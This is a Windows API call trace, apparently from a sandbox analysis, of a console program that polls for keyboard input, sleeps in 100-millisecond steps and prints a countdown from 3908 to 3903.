[0176.804] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.804] Sleep (dwMilliseconds=0x64)
[0176.913] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.913] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.913] Sleep (dwMilliseconds=0x64)
[0177.022] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.022] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0177.022] Sleep (dwMilliseconds=0x64)
[0177.131] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.132] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0177.132] Sleep (dwMilliseconds=0x64)
[0177.241] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.241] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.241] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083908") returned 8
[0177.241] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0177.241] __iob_func () returned 0x757a2900
[0177.241] _fileno (_File=0x757a2920) returned 1
[0177.241] _errno () returned 0x5507d8
[0177.241] _get_osfhandle (_FileHandle=1) returned 0x4c
[0177.241] _errno () returned 0x5507d8
[0177.241] GetFileType (hFile=0x4c) returned 0x2
[0177.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0177.241] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0177.241] lstrlenW (lpString="\x08\x08\x08\x083908") returned 8
[0177.241] GetConsoleOutputCP () returned 0x1b5
[0177.241] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083908", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0177.242] GetConsoleOutputCP () returned 0x1b5
[0177.242] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083908", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083908", lpUsedDefaultChar=0x0) returned 8
[0177.242] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0177.242] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0177.242] Sleep (dwMilliseconds=0x64)
[0177.350] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.350] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.350] Sleep (dwMilliseconds=0x64)
[0177.459] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.459] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.459] Sleep (dwMilliseconds=0x64)
[0177.568] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.568] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.568] Sleep (dwMilliseconds=0x64)
[0177.712] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.712] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.712] Sleep (dwMilliseconds=0x64)
[0177.849] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.849] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.849] Sleep (dwMilliseconds=0x64)
[0177.997] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0177.997] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0177.997] Sleep (dwMilliseconds=0x64)
[0178.130] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0178.130] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600d
[0178.130] Sleep (dwMilliseconds=0x64)
[0178.317] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0178.317] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600e
[0178.317] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083907") returned 8
[0178.317] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0178.317] __iob_func () returned 0x757a2900
[0178.317] _fileno (_File=0x757a2920) returned 1
[0178.317] _errno () returned 0x5507d8
[0178.317] _get_osfhandle (_FileHandle=1) returned 0x4c
[0178.317] _errno () returned 0x5507d8
[0178.317] GetFileType (hFile=0x4c) returned 0x2
[0178.317] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0178.317] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0178.317] lstrlenW (lpString="\x08\x08\x08\x083907") returned 8
[0178.318] GetConsoleOutputCP () returned 0x1b5
[0178.318] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083907", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0178.318] GetConsoleOutputCP () returned 0x1b5
[0178.318] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083907", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083907", lpUsedDefaultChar=0x0) returned 8
[0178.318] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0178.318] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0178.318] Sleep (dwMilliseconds=0x64)
[0178.457] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0178.457] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600e
[0178.457] Sleep (dwMilliseconds=0x64)
[0178.613] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0178.614] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600e
[0178.614] Sleep (dwMilliseconds=0x64)
[0178.800] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0178.801] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600e
[0178.801] Sleep (dwMilliseconds=0x64)
[0178.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0178.998] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600e
[0178.998] Sleep (dwMilliseconds=0x64)
[0179.159] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0179.159] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600e
[0179.159] Sleep (dwMilliseconds=0x64)
[0179.346] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0179.347] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600f
[0179.347] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083906") returned 8
[0179.347] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0179.347] __iob_func () returned 0x757a2900
[0179.347] _fileno (_File=0x757a2920) returned 1
[0179.347] _errno () returned 0x5507d8
[0179.347] _get_osfhandle (_FileHandle=1) returned 0x4c
[0179.347] _errno () returned 0x5507d8
[0179.347] GetFileType (hFile=0x4c) returned 0x2
[0179.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0179.347] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0179.347] lstrlenW (lpString="\x08\x08\x08\x083906") returned 8
[0179.347] GetConsoleOutputCP () returned 0x1b5
[0179.347] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083906", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0179.347] GetConsoleOutputCP () returned 0x1b5
[0179.347] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083906", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083906", lpUsedDefaultChar=0x0) returned 8
[0179.347] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0179.348] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0179.348] Sleep (dwMilliseconds=0x64)
[0179.534] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0179.534] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600f
[0179.534] Sleep (dwMilliseconds=0x64)
[0179.721] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0179.721] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600f
[0179.721] Sleep (dwMilliseconds=0x64)
[0179.894] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0179.894] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600f
[0179.894] Sleep (dwMilliseconds=0x64)
[0180.033] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.033] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600f
[0180.033] Sleep (dwMilliseconds=0x64)
[0180.173] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.173] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600f
[0180.173] Sleep (dwMilliseconds=0x64)
[0180.314] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.314] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0180.314] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083905") returned 8
[0180.314] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0180.314] __iob_func () returned 0x757a2900
[0180.314] _fileno (_File=0x757a2920) returned 1
[0180.314] _errno () returned 0x5507d8
[0180.314] _get_osfhandle (_FileHandle=1) returned 0x4c
[0180.314] _errno () returned 0x5507d8
[0180.314] GetFileType (hFile=0x4c) returned 0x2
[0180.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0180.314] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0180.314] lstrlenW (lpString="\x08\x08\x08\x083905") returned 8
[0180.314] GetConsoleOutputCP () returned 0x1b5
[0180.314] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083905", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0180.314] GetConsoleOutputCP () returned 0x1b5
[0180.315] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083905", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083905", lpUsedDefaultChar=0x0) returned 8
[0180.315] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0180.315] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0180.315] Sleep (dwMilliseconds=0x64)
[0180.454] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.454] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0180.454] Sleep (dwMilliseconds=0x64)
[0180.579] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.579] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0180.579] Sleep (dwMilliseconds=0x64)
[0180.688] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.688] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0180.688] Sleep (dwMilliseconds=0x64)
[0180.797] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.798] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0180.798] Sleep (dwMilliseconds=0x64)
[0180.906] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0180.907] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0180.907] Sleep (dwMilliseconds=0x64)
[0181.016] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.016] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0181.016] Sleep (dwMilliseconds=0x64)
[0181.125] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.125] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6010
[0181.125] Sleep (dwMilliseconds=0x64)
[0181.234] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.234] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.234] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083904") returned 8
[0181.234] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0181.234] __iob_func () returned 0x757a2900
[0181.234] _fileno (_File=0x757a2920) returned 1
[0181.235] _errno () returned 0x5507d8
[0181.235] _get_osfhandle (_FileHandle=1) returned 0x4c
[0181.235] _errno () returned 0x5507d8
[0181.235] GetFileType (hFile=0x4c) returned 0x2
[0181.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0181.235] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0181.235] lstrlenW (lpString="\x08\x08\x08\x083904") returned 8
[0181.235] GetConsoleOutputCP () returned 0x1b5
[0181.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083904", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0181.235] GetConsoleOutputCP () returned 0x1b5
[0181.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083904", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083904", lpUsedDefaultChar=0x0) returned 8
[0181.235] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0181.235] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0181.235] Sleep (dwMilliseconds=0x64)
[0181.343] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.343] Sleep (dwMilliseconds=0x64)
[0181.453] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.453] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.453] Sleep (dwMilliseconds=0x64)
[0181.562] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.562] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.562] Sleep (dwMilliseconds=0x64)
[0181.674] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.674] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.674] Sleep (dwMilliseconds=0x64)
[0181.790] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.790] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.790] Sleep (dwMilliseconds=0x64)
[0181.889] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.890] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.890] Sleep (dwMilliseconds=0x64)
[0181.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0181.999] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0181.999] Sleep (dwMilliseconds=0x64)
[0182.108] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.108] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0182.108] Sleep (dwMilliseconds=0x64)
[0182.217] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.217] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6011
[0182.217] Sleep (dwMilliseconds=0x64)
[0182.326] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.326] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.326] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083903") returned 8
[0182.326] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0182.327] __iob_func () returned 0x757a2900
[0182.327] _fileno (_File=0x757a2920) returned 1
[0182.327] _errno () returned 0x5507d8
[0182.327] _get_osfhandle (_FileHandle=1) returned 0x4c
[0182.327] _errno () returned 0x5507d8
[0182.327] GetFileType (hFile=0x4c) returned 0x2
[0182.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0182.327] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0182.327] lstrlenW (lpString="\x08\x08\x08\x083903") returned 8
[0182.327] GetConsoleOutputCP () returned 0x1b5
[0182.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083903", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0182.327] GetConsoleOutputCP () returned 0x1b5
[0182.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083903", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083903", lpUsedDefaultChar=0x0) returned 8
[0182.327] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0182.327] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0182.327] Sleep (dwMilliseconds=0x64)
[0182.435] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.436] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.436] Sleep (dwMilliseconds=0x64)
[0182.545] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.545] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.545] Sleep (dwMilliseconds=0x64)
[0182.654] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.655] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.655] Sleep (dwMilliseconds=0x64)
[0182.773] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.773] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.773] Sleep (dwMilliseconds=0x64)
[0182.872] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.872] Sleep (dwMilliseconds=0x64)
[0182.988] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0182.988] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0182.988] Sleep (dwMilliseconds=0x64)
[0183.091] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.091] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0183.091] Sleep (dwMilliseconds=0x64)
[0183.200] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.200] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6012
[0183.200] Sleep (dwMilliseconds=0x64)
